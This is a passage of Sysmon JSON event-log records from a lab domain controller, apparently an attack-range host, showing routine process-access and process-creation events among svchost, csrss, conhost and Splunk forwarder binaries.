C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.814","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3473,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.814\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.814","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3474,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.814\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.814","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3475,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.814\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.814","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3476,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.814\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF5-5F25-0000-0010197B0500}\r\nTargetProcessId: 4832\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.814","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF5-5F25-0000-0010197B0500}","TargetProcessId":"4832","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3477,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.832\r\nProcessGuid: {41C8662E-1FF5-5F25-0000-0010D17B0500}\r\nProcessId: 4860\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool validate-regex --log-warnings\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {41C8662E-1FF5-5F25-0000-0010197B0500}\r\nParentProcessId: 4832\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" validate-regex --log-warnings","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.832","ProcessGuid":"{41C8662E-1FF5-5F25-0000-0010D17B0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool validate-regex --log-warnings","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{41C8662E-1FF5-5F25-0000-0010197B0500}","ParentProcessId":"4832","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" validate-regex --log-warnings","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3478,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.829\r\nSourceProcessGUID: {41C8662E-1FF5-5F25-0000-0010197B0500}\r\nSourceProcessId: 4832\r\nSourceThreadId: 4836\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {41C8662E-1FF5-5F25-0000-0010D17B0500}\r\nTargetProcessId: 4860\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.829","SourceProcessGUID":"{41C8662E-1FF5-5F25-0000-0010197B0500}","SourceProcessId":"4832","SourceThreadId":"4836","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{41C8662E-1FF5-5F25-0000-0010D17B0500}","TargetProcessId":"4860","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3479,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.829\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF5-5F25-0000-0010D17B0500}\r\nTargetProcessId: 4860\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.829","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF5-5F25-0000-0010D17B0500}","TargetProcessId":"4860","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3480,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.829\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.829","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3481,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.829\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 